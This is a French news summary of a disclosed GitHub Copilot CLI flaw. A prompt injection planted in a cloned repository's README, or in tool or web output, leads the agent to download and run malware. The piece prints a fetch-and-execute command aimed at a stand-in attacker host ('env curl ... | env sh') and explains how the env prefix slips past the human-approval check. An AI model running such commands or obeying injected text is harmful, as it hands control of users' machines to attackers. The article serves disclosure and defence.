La vulnérabilité de GitHub Copilot CLI permet l'exécution de logiciels malveillants via l'injection de prompts.

Aperçu de la vulnérabilité
GitHub Copilot CLI contient des vulnérabilités qui exposent les utilisateurs à l'exécution arbitraire de commandes shell via une injection indirecte de prompt sans approbation de l'utilisateur. Des logiciels malveillants peuvent être téléchargés depuis des serveurs externes et exécutés sans aucune interaction de l'utilisateur au-delà de la requête initiale au Copilot CLI.
Fonctionnement de l'attaque
La chaîne d'attaque implique :
- L'utilisateur interroge GitHub Copilot CLI en explorant un référentiel open source
- Copilot rencontre une injection de prompt stockée dans un fichier README du référentiel cloné (ou d'autres vecteurs comme les résultats de recherche web, les résultats d'appels d'outils MCP, la sortie de commandes terminal)
- La commande malveillante contourne les systèmes d'approbation avec intervention humaine
Contournement des mécanismes de protection
GitHub Copilot utilise un système d'approbation avec intervention humaine qui nécessite le consentement de l'utilisateur avant l'exécution de commandes potentiellement dangereuses. Ce système est déclenché sauf si :
- L'utilisateur a explicitement configuré la commande pour s'exécuter automatiquement
- La commande fait partie d'une liste 'en lecture seule' codée en dur trouvée dans le code source
Les vérifications d'accès aux URL externes nécessitent l'approbation de l'utilisateur pour des commandes comme curl, wget ou l'outil de récupération web intégré de Copilot. Cependant, les attaquants peuvent contourner ces protections en utilisant :
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shLa commande env figure sur la liste en lecture seule codée en dur, elle s'exécute donc automatiquement sans approbation. Puisque curl et sh sont passés comme arguments à env, ils sont incorrectement analysés et non identifiés par le validateur comme des sous-commandes. Cela contourne les vérifications de permission d'URL qui dépendent de la détection de commandes comme curl.
Réponse de GitHub
GitHub a répondu : "Nous avons examiné votre rapport et validé vos conclusions. Après avoir évalué en interne cette découverte, nous avons déterminé qu'il s'agit d'un problème connu qui ne présente pas de risque de sécurité significatif. Nous pourrions rendre cette fonctionnalité plus stricte à l'avenir, mais nous n'avons rien à annoncer pour le moment."
Portée et limitations
Les vulnérabilités d'analyse de commandes décrites sont spécifiques à macOS. Cependant, GitHub Copilot présente des vulnérabilités supplémentaires incluant à la fois des risques indépendants du système d'exploitation et des risques spécifiques à Windows. D'autres vulnérabilités d'analyse de commandes permettent la lecture et l'écriture arbitraires de fichiers.
📖 Lire la source complète : HN LLM Tools
👀 See Also

Tableau de bord en direct des outils OpenClaw exposés
Tableau de bord présentant les panneaux de contrôle exposés des outils OpenClaw comme Moltbot et Clawdbot.

Agent Hush : Un outil open-source empêche les agents d'IA de codage de divulguer des données sensibles
Agent Hush est un outil open source qui intercepte discrètement les données sensibles avant qu'elles ne quittent votre machine. Il a été créé après qu'un agent d'IA de développement d'un programmeur a divulgué des clés API, des adresses IP de serveurs et des informations personnelles dans un dépôt GitHub public lors de la création d'un projet de sécurité.

L'expérience d'audit de sécurité montre que les performances des agents IA dépendent de l'accès aux connaissances.
Un développeur a réalisé trois audits de sécurité sur la même base de code Next.js en utilisant différentes approches d'IA : la revue intégrée de Claude Code a trouvé 1 critique, 6 élevés, 13 moyens ; un agent IA sans contexte supplémentaire a trouvé 1 critique, 5 élevés, 14 moyens ; un agent IA avec 10 livres professionnels de sécurité a trouvé 8 critiques, 9 élevés, 10 moyens.

Vérificateur SBOM hors ligne pour OpenClaw détecte les compétences empoisonnées en moins de 0,2 secondes
Un développeur a créé un outil de vérification hors ligne des SBOM en Rust qui a détecté une compétence OpenClaw empoisonnée exfiltrant des clés SSH, la vérification s'achevant en moins de 0,2 seconde sans accès à Internet.